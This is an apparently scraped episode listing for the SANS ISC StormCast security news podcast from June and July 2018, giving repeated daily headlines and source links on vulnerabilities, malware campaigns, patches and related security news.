Summary of Earchings in Recent Sextortion Attack https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money/23922/ Adware Distributed with Legitimate Applications https://www.bleepingcomputer.com/news/security/fake-websites-for-keepass-7zip-audacity-others-found-pushing-adware/ https://twitter.com/JusticeRage PDF Editor Supply Chain Exploit https://cloudblogs.microsoft.com/microsoftsecure/2018/07/26/attack-inception-compromised-supply-chain-within-a-supply-chain-poses-new-risks/
7/30/20187 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, July 27th 2018

NetSpectre: Read Arbitrary Memory over the Network https://misc0110.net/web/files/netspectre.pdf Google Play Store Bans Crypto Miners https://play.google.com/about/developer-content-policy-print/ Japanese Calendar Issues https://blogs.msdn.microsoft.com/shawnste/2018/04/12/the-japanese-calendars-y2k-moment/ Multiple Vulnerabilities in Samsung SmartThings Hub https://blog.talosintelligence.com/2018/07/samsung-smartthings-vulns.html?m=1 Times Change and Your Training Data Should Too: The Effect of Training Data Recency on Twitter Classifiers. Ryan O'Grady https://www.sans.org/reading-room/whitepapers/artificialintelligence/times-change-training-data-too-effect-training-data-recency-twitter-classifiers-38500
7/27/201815 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, July 27th 2018

NetSpectre: Read Arbitrary Memory over the Network https://misc0110.net/web/files/netspectre.pdf Google Play Store Bans Crypto Miners https://play.google.com/about/developer-content-policy-print/ Japanese Calendar Issues https://blogs.msdn.microsoft.com/shawnste/2018/04/12/the-japanese-calendars-y2k-moment/ Multiple Vulnerabilities in Samsung SmartThings Hub https://blog.talosintelligence.com/2018/07/samsung-smartthings-vulns.html?m=1 Times Change and Your Training Data Should Too: The Effect of Training Data Recency on Twitter Classifiers. Ryan O'Grady https://www.sans.org/reading-room/whitepapers/artificialintelligence/times-change-training-data-too-effect-training-data-recency-twitter-classifiers-38500
7/27/201815 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, July 26th 2018

Etherscan.io XSS Vulnerability https://scotthelme.co.uk/xss-on-etherscan-io/ Tomcat Vulnerabilities Patched https://www.us-cert.gov/ncas/current-activity/2018/07/23/Apache-Releases-Security-Updates-Apache-Tomcat DNS over HTTPS Standard Finalized https://datatracker.ietf.org/wg/doh/about/ ERP Systems Targeted in Recent Attacks https://www.us-cert.gov/ncas/current-activity/2018/07/25/Malicious-Cyber-Activity-Targeting-ERP-Applications
7/26/20185 minutes, 19 seconds
Episode Artwork

ISC StormCast for Thursday, July 26th 2018

Etherscan.io XSS Vulnerability https://scotthelme.co.uk/xss-on-etherscan-io/ Tomcat Vulnerabilities Patched https://www.us-cert.gov/ncas/current-activity/2018/07/23/Apache-Releases-Security-Updates-Apache-Tomcat DNS over HTTPS Standard Finalized https://datatracker.ietf.org/wg/doh/about/ ERP Systems Targeted in Recent Attacks https://www.us-cert.gov/ncas/current-activity/2018/07/25/Malicious-Cyber-Activity-Targeting-ERP-Applications
7/26/20185 minutes, 19 seconds
Episode Artwork

ISC StormCast for Wednesday, July 25th 2018

Emotet Update https://isc.sans.edu/forums/diary/Recent+Emotet+activity/23908/ Clear Text Phone Tracking https://isc.sans.edu/forums/diary/Cell+Phone+Monitoring+Who+is+Watching+the+Watchers/23910/ Bluetooth Bug https://www.kb.cert.org/vuls/id/304725 Apache OpenWhisk Vulnerability https://www.puresec.io/blog/Apache_OpenWhisk_Mutability_Weakness?hs_preview=EpJUmSoY-5972289702
7/25/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, July 25th 2018

Emotet Update https://isc.sans.edu/forums/diary/Recent+Emotet+activity/23908/ Clear Text Phone Tracking https://isc.sans.edu/forums/diary/Cell+Phone+Monitoring+Who+is+Watching+the+Watchers/23910/ Bluetooth Bug https://www.kb.cert.org/vuls/id/304725 Apache OpenWhisk Vulnerability https://www.puresec.io/blog/Apache_OpenWhisk_Mutability_Weakness?hs_preview=EpJUmSoY-5972289702
7/25/20185 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, July 24th 2018

More Spectre https://arxiv.org/pdf/1807.07940.pdf July IE Patch Fixed older Remote Code Exec. Bug http://blogs.360.cn/blog/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day/ Google Chrome 68 Released Today. HTTP sites marked as "insecure" https://support.google.com/chrome/a/answer/7679408?hl=en DNS Rebinding Vulnerablity Common in IoT https://www.armis.com/dns-rebinding-exposes-half-a-billion-iot-devices-in-the-enterprise/
7/24/20186 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, July 24th 2018

More Spectre https://arxiv.org/pdf/1807.07940.pdf July IE Patch Fixed older Remote Code Exec. Bug http://blogs.360.cn/blog/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day/ Google Chrome 68 Released Today. HTTP sites marked as "insecure" https://support.google.com/chrome/a/answer/7679408?hl=en DNS Rebinding Vulnerablity Common in IoT https://www.armis.com/dns-rebinding-exposes-half-a-billion-iot-devices-in-the-enterprise/
7/24/20186 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, July 23rd 2018

New WebLogic Vulnerability Already Exploited https://isc.sans.edu/forums/diary/Weblogic+Exploit+Code+Made+Public+CVE20182893/23896/ Microsoft Edge Turns off XSS Protection https://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge Intel Management Engine Vulnerabilities https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00112.html User Tracking With TLS 1.2 Certificates http://tma.ifip.org/wordpress/wp-content/uploads/2017/06/tma2017_paper2.pdf
7/23/20185 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, July 23rd 2018

New WebLogic Vulnerability Already Exploited https://isc.sans.edu/forums/diary/Weblogic+Exploit+Code+Made+Public+CVE20182893/23896/ Microsoft Edge Turns off XSS Protection https://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge Intel Management Engine Vulnerabilities https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00112.html User Tracking With TLS 1.2 Certificates http://tma.ifip.org/wordpress/wp-content/uploads/2017/06/tma2017_paper2.pdf
7/23/20185 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, July 20th 2018

Cisco Patches https://tools.cisco.com/security/center/publicationListing.x Diqee Smart Vacuum Vulnerabilities http://en.diqee.com/goods/1994.html Instagram About To Release 2FA Update https://techcrunch.com/2018/07/17/instagram-2-factor/ Reporting Malicious Websites https://isc.sans.edu/forums/diary/Reporting+Malicious+Websites+in+2018/23892/
7/20/20185 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, July 20th 2018

Cisco Patches https://tools.cisco.com/security/center/publicationListing.x Diqee Smart Vacuum Vulnerabilities http://en.diqee.com/goods/1994.html Instagram About To Release 2FA Update https://techcrunch.com/2018/07/17/instagram-2-factor/ Reporting Malicious Websites https://isc.sans.edu/forums/diary/Reporting+Malicious+Websites+in+2018/23892/
7/20/20185 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, July 19th 2018

Increase in scans for port 15454 https://isc.sans.edu/forums/diary/Request+for+Packets+Port+15454/23888/ Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html Venmo Public Transaction API https://publicbydefault.fyi Credential Stuffing Responsible for Majority of Login Attempts http://info.shapesecurity.com/2018-Credential-Spill-Report-by-Shape-Security
7/19/20185 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, July 19th 2018

Increase in scans for port 15454 https://isc.sans.edu/forums/diary/Request+for+Packets+Port+15454/23888/ Oracle Quarterly Critical Patch Update http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html Venmo Public Transaction API https://publicbydefault.fyi Credential Stuffing Responsible for Majority of Login Attempts http://info.shapesecurity.com/2018-Credential-Spill-Report-by-Shape-Security
7/19/20185 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, July 18th 2018

Searching for Geographically Improbably Login Attempts https://isc.sans.edu/forums/diary/Searching+for+Geographically+Improbable+Login+Attempts/23882/ Typo3 CMS Update https://typo3.org/article/typo3-931-8717-and-7630-security-releases-published/ GitHub Expands Security Scanner to Python https://blog.github.com/2018-07-12-security-vulnerability-alerts-for-python/ Money Laundry Scheme Exposed by Open Mongo database. https://kromtech.com/blog/security-center/digital-laundry
7/18/20185 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, July 18th 2018

Searching for Geographically Improbably Login Attempts https://isc.sans.edu/forums/diary/Searching+for+Geographically+Improbable+Login+Attempts/23882/ Typo3 CMS Update https://typo3.org/article/typo3-931-8717-and-7630-security-releases-published/ GitHub Expands Security Scanner to Python https://blog.github.com/2018-07-12-security-vulnerability-alerts-for-python/ Money Laundry Scheme Exposed by Open Mongo database. https://kromtech.com/blog/security-center/digital-laundry
7/18/20185 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, July 17th 2018

Encrypted SNI in TLS 1.3 https://tools.ietf.org/html/draft-rescorla-tls-esni-00 Microsoft to Retire "Delta Updates" https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426 Practical GPS Spoofing of Navigation Devices https://www.microsoft.com/en-us/research/uploads/prod/2018/06/security18gps.pdf
7/17/20187 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, July 17th 2018

Encrypted SNI in TLS 1.3 https://tools.ietf.org/html/draft-rescorla-tls-esni-00 Microsoft to Retire "Delta Updates" https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426 Practical GPS Spoofing of Navigation Devices https://www.microsoft.com/en-us/research/uploads/prod/2018/06/security18gps.pdf
7/17/20187 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, July 16th 2018

Processing JSON https://isc.sans.edu/forums/diary/Video+Retrieving+and+processing+JSON+data+BTC+example/23874/ Cryptocoin Mining Javascript (yet again) https://isc.sans.edu/forums/diary/Cryptominer+Delivered+Though+Compromized+JavaScript+File/23870/ Dahua Passwords Leaked/Cached by Search Engine https://www.bleepingcomputer.com/news/security/passwords-for-tens-of-thousands-of-dahua-devices-cached-in-iot-search-engine/ MDM Used in Targeted Attack Against iPhone Users https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html
7/16/20187 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, July 16th 2018

Processing JSON https://isc.sans.edu/forums/diary/Video+Retrieving+and+processing+JSON+data+BTC+example/23874/ Cryptocoin Mining Javascript (yet again) https://isc.sans.edu/forums/diary/Cryptominer+Delivered+Though+Compromized+JavaScript+File/23870/ Dahua Passwords Leaked/Cached by Search Engine https://www.bleepingcomputer.com/news/security/passwords-for-tens-of-thousands-of-dahua-devices-cached-in-iot-search-engine/ MDM Used in Targeted Attack Against iPhone Users https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html
7/16/20187 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, July 13th 2018

Extortion Claims Include Leaked Passwords to Appear more Plausiable https://isc.sans.edu/forums/diary/New+Extortion+Tricks+Now+Including+Your+Password/23866/ npm Package Compromised and Used To Steal Credentials https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026 CIRCL IMAP Proxy https://github.com/CIRCL/IMAP-Proxy Checkpoint Names "Dorkbot" As A Top Threat (Signup required) https://research.checkpoint.com/cyber-attack-trends-2018-mid-year-report/
7/13/20185 minutes, 54 seconds
Episode Artwork

ISC StormCast for Friday, July 13th 2018

Extortion Claims Include Leaked Passwords to Appear more Plausiable https://isc.sans.edu/forums/diary/New+Extortion+Tricks+Now+Including+Your+Password/23866/ npm Package Compromised and Used To Steal Credentials https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026 CIRCL IMAP Proxy https://github.com/CIRCL/IMAP-Proxy Checkpoint Names "Dorkbot" As A Top Threat (Signup required) https://research.checkpoint.com/cyber-attack-trends-2018-mid-year-report/
7/13/20185 minutes, 54 seconds
Episode Artwork

ISC StormCast for Thursday, July 12th 2018

Hello Peppa Followup https://isc.sans.edu/forums/diary/Well+Hello+Again+Peppa/23860/ Spectre 1.1 and 1.2 https://people.csail.mit.edu/vlk/spectre11.pdf Internet Exchanges Band Together against BGP Hijacking https://dyn.com/blog/shutting-down-the-bgp-hijack-factory/ Google Enabled Site Isolation in Chrome https://www.bleepingcomputer.com/news/security/google-enables-site-isolation-feature-for-99-percent-of-chrome-desktop-users/
7/12/20185 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, July 12th 2018

Hello Peppa Followup https://isc.sans.edu/forums/diary/Well+Hello+Again+Peppa/23860/ Spectre 1.1 and 1.2 https://people.csail.mit.edu/vlk/spectre11.pdf Internet Exchanges Band Together against BGP Hijacking https://dyn.com/blog/shutting-down-the-bgp-hijack-factory/ Google Enabled Site Isolation in Chrome https://www.bleepingcomputer.com/news/security/google-enables-site-isolation-feature-for-99-percent-of-chrome-desktop-users/
7/12/20185 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, July 11th 2018

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+July+2018+now+with+Dashboard/23858/ https://patchtuesdaydashboard.com/ SettingContent-ms Files Blacklisted https://support.office.com/en-us/article/packager-activation-in-office-365-desktop-applications-52808039-4a7c-4550-be3a-869dd338d834?ui=en-US&rs=en-US&ad=US Adobe Patches https://helpx.adobe.com/security.html Stolen DLINK Certificate https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/
7/11/20186 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, July 11th 2018

MSFT Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+July+2018+now+with+Dashboard/23858/ https://patchtuesdaydashboard.com/ SettingContent-ms Files Blacklisted https://support.office.com/en-us/article/packager-activation-in-office-365-desktop-applications-52808039-4a7c-4550-be3a-869dd338d834?ui=en-US&rs=en-US&ad=US Adobe Patches https://helpx.adobe.com/security.html Stolen DLINK Certificate https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/
7/11/20186 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, July 10th 2018

Reverse Shell via Weblogic Flaw https://isc.sans.edu/forums/diary/Criminals+Dont+Read+Instructions+or+Use+Strong+Passwords/23850/ Apple Patches Everything Again https://isc.sans.edu/forums/diary/Apple+Patches+Everything+Again/23852/ Microsoft Offers Better Azure AD Password Protection http://www.longevitytech.us/2018/07/09/azure-ad-password-protection-the-cloud-security-service-your-active-directory-needs-now/
7/10/20185 minutes, 43 seconds
Episode Artwork

ISC StormCast for Tuesday, July 10th 2018

Reverse Shell via Weblogic Flaw https://isc.sans.edu/forums/diary/Criminals+Dont+Read+Instructions+or+Use+Strong+Passwords/23850/ Apple Patches Everything Again https://isc.sans.edu/forums/diary/Apple+Patches+Everything+Again/23852/ Microsoft Offers Better Azure AD Password Protection http://www.longevitytech.us/2018/07/09/azure-ad-password-protection-the-cloud-security-service-your-active-directory-needs-now/
7/10/20185 minutes, 43 seconds
Episode Artwork

ISC StormCast for Monday, July 9th 2018

Trivial Exploit For HP iLO 4 (patched last August) https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf Flexible Miner/Ransomware https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ Hacker Steals Gas From Gas Station https://gizmodo.com/hackers-reportedly-stole-600-gallons-of-gas-from-detroi-1827433411
7/9/20184 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, July 9th 2018

Trivial Exploit For HP iLO 4 (patched last August) https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf Flexible Miner/Ransomware https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ Hacker Steals Gas From Gas Station https://gizmodo.com/hackers-reportedly-stole-600-gallons-of-gas-from-detroi-1827433411
7/9/20184 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, July 6th 2018

Gentoo GitHub Breach Post Morten https://wiki.gentoo.org/wiki/Github/2018-06-28 Hamas Sets World Cup Trap for Israeli Soldiers https://www.reuters.com/article/us-israel-palestinians-cyber/israel-says-hamas-tried-to-snare-soldiers-in-world-cup-cyber-trap-idUSKBN1JT1ZX
7/6/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, July 6th 2018

Gentoo GitHub Breach Post Morten https://wiki.gentoo.org/wiki/Github/2018-06-28 Hamas Sets World Cup Trap for Israeli Soldiers https://www.reuters.com/article/us-israel-palestinians-cyber/israel-says-hamas-tried-to-snare-soldiers-in-world-cup-cyber-trap-idUSKBN1JT1ZX
7/6/20185 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, July 5th 2018

Progress Indication For Scripts in Windows https://isc.sans.edu/forums/diary/Progress+indication+for+scripts+on+Windows/23830/ Stylish Extension Steals History https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/ Data Leaks From Android Apps https://recon.meddle.mobi/panoptispy/
7/5/20183 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, July 5th 2018

Progress Indication For Scripts in Windows https://isc.sans.edu/forums/diary/Progress+indication+for+scripts+on+Windows/23830/ Stylish Extension Steals History https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/ Data Leaks From Android Apps https://recon.meddle.mobi/panoptispy/
7/5/20183 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, July 3rd 2018

Odd PHP Exploit Attempt https://isc.sans.edu/forums/diary/Hello+Peppa+PHP+Scans/23826/ Diameter Security Report https://www.ptsecurity.com/ww-en/premium/diameter-2018/ Attack Against Trezor via DNS or BGP https://blog.trezor.io/psa-phishing-alert-fake-trezor-wallet-website-3bcfdfc3eced Symantec Offers VPNFilter Check http://www.symantec.com/filtercheck/
7/2/20185 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, July 3rd 2018

Odd PHP Exploit Attempt https://isc.sans.edu/forums/diary/Hello+Peppa+PHP+Scans/23826/ Diameter Security Report https://www.ptsecurity.com/ww-en/premium/diameter-2018/ Attack Against Trezor via DNS or BGP https://blog.trezor.io/psa-phishing-alert-fake-trezor-wallet-website-3bcfdfc3eced Symantec Offers VPNFilter Check http://www.symantec.com/filtercheck/
7/2/20185 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, July 2nd 2018

MacOS Malware Targeting Slack/Dicord Crypto Comunities https://isc.sans.edu/forums/diary/Crypto+community+target+of+MacOS+malware/23816/ New LTE Attacks Made Public https://alter-attack.net Rowhammer Attacks Against Android https://rampageattack.com
7/2/20186 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, July 2nd 2018

MacOS Malware Targeting Slack/Dicord Crypto Comunities https://isc.sans.edu/forums/diary/Crypto+community+target+of+MacOS+malware/23816/ New LTE Attacks Made Public https://alter-attack.net Rowhammer Attacks Against Android https://rampageattack.com
7/2/20186 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, June 29th 2018

Less Greedy Cryptominers https://isc.sans.edu/forums/diary/New+and+Improved+Cryptominers+Now+with+50+less+Greed/23812/ Disassemling Webassembly https://www.forcepoint.com/blog/security-labs/analyzing-webassembly-binaries Spectre Browser Mitigation Bypass https://alephsecurity.com/2018/06/26/spectre-browser-query-cache/ Gentoo Github Repository Compromise https://archives.gentoo.org/gentoo-announce/message/dc23d48d2258e1ed91599a8091167002
6/29/20186 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, June 29th 2018

Less Greedy Cryptominers https://isc.sans.edu/forums/diary/New+and+Improved+Cryptominers+Now+with+50+less+Greed/23812/ Disassemling Webassembly https://www.forcepoint.com/blog/security-labs/analyzing-webassembly-binaries Spectre Browser Mitigation Bypass https://alephsecurity.com/2018/06/26/spectre-browser-query-cache/ Gentoo Github Repository Compromise https://archives.gentoo.org/gentoo-announce/message/dc23d48d2258e1ed91599a8091167002
6/29/20186 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, June 28th 2018

Secret Office 365 Activity Log API Unveiled (plus tool to extract logs) http://lmgsecurity.com/exposing-the-secret-office-365-forensics-tool/ Anonymizing Printers https://tu-dresden.de/ing/informatik/sya/ps/die-professur/news/geheime-daten-auf-dem-druckpapier-diplominformatiker-der-tu-dresden-entwickeln-verfahren-gegen-druckerueberwachung Silently Profiling Unknown Malware Samples https://isc.sans.edu/forums/diary/Silently+Profiling+Unknown+Malware+Samples/23808/ Cisco CVE-2018-0296 Exploited https://www.bleepingcomputer.com/news/security/cisco-asa-flaw-exploited-in-the-wild-after-publication-of-two-pocs/
6/27/20187 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, June 28th 2018

Secret Office 365 Activity Log API Unveiled (plus tool to extract logs) http://lmgsecurity.com/exposing-the-secret-office-365-forensics-tool/ Anonymizing Printers https://tu-dresden.de/ing/informatik/sya/ps/die-professur/news/geheime-daten-auf-dem-druckpapier-diplominformatiker-der-tu-dresden-entwickeln-verfahren-gegen-druckerueberwachung Silently Profiling Unknown Malware Samples https://isc.sans.edu/forums/diary/Silently+Profiling+Unknown+Malware+Samples/23808/ Cisco CVE-2018-0296 Exploited https://www.bleepingcomputer.com/news/security/cisco-asa-flaw-exploited-in-the-wild-after-publication-of-two-pocs/
6/27/20187 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, June 27th 2018

Analyzing XPS Files https://isc.sans.edu/forums/diary/Analyzing+XPS+files/23804/ WPA3 Standard Finalized https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-wi-fi-certified-wpa3-security Executing Code with SettingContent-ms Files https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 EFF Analysis of STARTTLS https://www.eff.org/deeplinks/2018/06/technical-deep-dive-starttls-everywhere
6/27/20187 minutes, 14 seconds
Episode Artwork

ISC StormCast for Wednesday, June 27th 2018

Analyzing XPS Files https://isc.sans.edu/forums/diary/Analyzing+XPS+files/23804/ WPA3 Standard Finalized https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-wi-fi-certified-wpa3-security Executing Code with SettingContent-ms Files https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 EFF Analysis of STARTTLS https://www.eff.org/deeplinks/2018/06/technical-deep-dive-starttls-everywhere
6/27/20187 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, June 26th 2018

Guilty By Association https://isc.sans.edu/forums/diary/Guilty+by+association/23800/ Filezila and Adware https://forum.filezilla-project.org/viewtopic.php?t=48441 iOS Pin Brute Forcing Confusion https://twitter.com/hackerfantastic/status/1010631766087032832 https://twitter.com/hackerfantastic/status/1010240042990596096 Azure Baseline Security Policy https://cloudblogs.microsoft.com/enterprisemobility/2018/06/22/baseline-security-policy-for-azure-ad-admin-accounts-in-public-preview/ Phone Battery Usage as Keystroke Logger https://sites.google.com/site/silbersteinmark/Home/popets18power.pdf?attredirects=1
6/26/20187 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, June 26th 2018

Guilty By Association https://isc.sans.edu/forums/diary/Guilty+by+association/23800/ Filezila and Adware https://forum.filezilla-project.org/viewtopic.php?t=48441 iOS Pin Brute Forcing Confusion https://twitter.com/hackerfantastic/status/1010631766087032832 https://twitter.com/hackerfantastic/status/1010240042990596096 Azure Baseline Security Policy https://cloudblogs.microsoft.com/enterprisemobility/2018/06/22/baseline-security-policy-for-azure-ad-admin-accounts-in-public-preview/ Phone Battery Usage as Keystroke Logger https://sites.google.com/site/silbersteinmark/Home/popets18power.pdf?attredirects=1
6/26/20187 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, June 25th 2018

XPS Documents Used for Spam https://isc.sans.edu/forums/diary/XPS+Attachment+Used+for+Phishing/23794/ New Exploit Kit Trends https://researchcenter.paloaltonetworks.com/2018/06/unit42-the-old-and-new-current-trends-in-web-based-threats/ https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-review/ Deprecating TLSv1.0 and TLSv1.1 https://datatracker.ietf.org/doc/draft-moriarty-tls-oldversions-diediedie/ Leaky Firebase Installs http://info.appthority.com/-q2-2018-mtr-download-Firebase-vulnerability
6/25/20185 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, June 25th 2018

XPS Documents Used for Spam https://isc.sans.edu/forums/diary/XPS+Attachment+Used+for+Phishing/23794/ New Exploit Kit Trends https://researchcenter.paloaltonetworks.com/2018/06/unit42-the-old-and-new-current-trends-in-web-based-threats/ https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-review/ Deprecating TLSv1.0 and TLSv1.1 https://datatracker.ietf.org/doc/draft-moriarty-tls-oldversions-diediedie/ Leaky Firebase Installs http://info.appthority.com/-q2-2018-mtr-download-Firebase-vulnerability
6/25/20185 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, June 22nd 2018

Fake Fortnite https://blog.malwarebytes.com/cybercrime/2018/06/fake-fortnite-android-links-found-youtube/ Fake Wannacry E-Mails https://twitter.com/actionfrauduk/status/1009803967705092096 Ransomware Installs In Internet Cafes http://hznews.hangzhou.com.cn/shehui/content/2018-06/16/content_7020998.htm OpenVPN Malicious Configuration Files https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x
6/22/20185 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, June 22nd 2018

Fake Fortnite https://blog.malwarebytes.com/cybercrime/2018/06/fake-fortnite-android-links-found-youtube/ Fake Wannacry E-Mails https://twitter.com/actionfrauduk/status/1009803967705092096 Ransomware Installs In Internet Cafes http://hznews.hangzhou.com.cn/shehui/content/2018-06/16/content_7020998.htm OpenVPN Malicious Configuration Files https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x
6/22/20185 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, June 21st 2018

Netflix Phishing Sites Using TLS https://isc.sans.edu/forums/diary/Secure+Phishing+Netflix+Phishing+Goes+TLS/23786/ OpenBSD Disables Hyperthreading By Default https://www.mail-archive.com/[email protected]/msg99141.html Bithumb Cyrpto Currency Exchnage Breached Again https://www.bleepingcomputer.com/news/security/bithumb-hacked-second-time-in-a-year-hackers-steal-31-million/ Microsoft Edge CORS Bypass via Audio Files https://jakearchibald.com/2018/i-discovered-a-browser-bug/ Microsoft Releases a Special Patch for Oracle Outside-In Libraries https://support.microsoft.com/en-us/help/4092041/description-of-the-security-update-for-microsoft-exchange-server-2013
6/21/20186 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, June 21st 2018

Netflix Phishing Sites Using TLS https://isc.sans.edu/forums/diary/Secure+Phishing+Netflix+Phishing+Goes+TLS/23786/ OpenBSD Disables Hyperthreading By Default https://www.mail-archive.com/[email protected]/msg99141.html Bithumb Cyrpto Currency Exchnage Breached Again https://www.bleepingcomputer.com/news/security/bithumb-hacked-second-time-in-a-year-hackers-steal-31-million/ Microsoft Edge CORS Bypass via Audio Files https://jakearchibald.com/2018/i-discovered-a-browser-bug/ Microsoft Releases a Special Patch for Oracle Outside-In Libraries https://support.microsoft.com/en-us/help/4092041/description-of-the-security-update-for-microsoft-exchange-server-2013
6/21/20186 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, June 20th 2018

PowerShell ScriptBlock Loggin Bypass in the Wild https://isc.sans.edu/forums/diary/PowerShell+ScriptBlock+Logging+Or+Not/23782/ Virustotal "False Positive" Alert http://blog.virustotal.com/2018/06/vtmonitor-to-mitigate-false-positives.html Cloud Environments Explosed to the Internet https://info.lacework.com/hubfs/Containers%20At-Risk_%20A%20Review%20of%2021,000%20Cloud%20Environments.pdf Google Home DNS Rebinding Attack Reveals Geolocation https://www.tripwire.com/state-of-security/vert/googles-newest-feature-find-my-home
6/19/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, June 20th 2018

PowerShell ScriptBlock Loggin Bypass in the Wild https://isc.sans.edu/forums/diary/PowerShell+ScriptBlock+Logging+Or+Not/23782/ Virustotal "False Positive" Alert http://blog.virustotal.com/2018/06/vtmonitor-to-mitigate-false-positives.html Cloud Environments Explosed to the Internet https://info.lacework.com/hubfs/Containers%20At-Risk_%20A%20Review%20of%2021,000%20Cloud%20Environments.pdf Google Home DNS Rebinding Attack Reveals Geolocation https://www.tripwire.com/state-of-security/vert/googles-newest-feature-find-my-home
6/19/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, June 19th 2018

Obfuscated JavaScript Targeting Mobile Devices https://isc.sans.edu/forums/diary/Malicious+JavaScript+Targeting+Mobile+Browsers/23778/ Axis Camera Vulnerabilities https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/ Apple Caches Confidential Data on Unencrypted Drives https://wojciechregula.blog/your-encrypted-photos-in-macos-cache/ Andy Emulator Infected With CryptoMiner https://www.reddit.com/r/emulators/comments/8rj8g5/warning_andy_android_emulator_andyos_andyroid/
6/19/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Tuesday, June 19th 2018

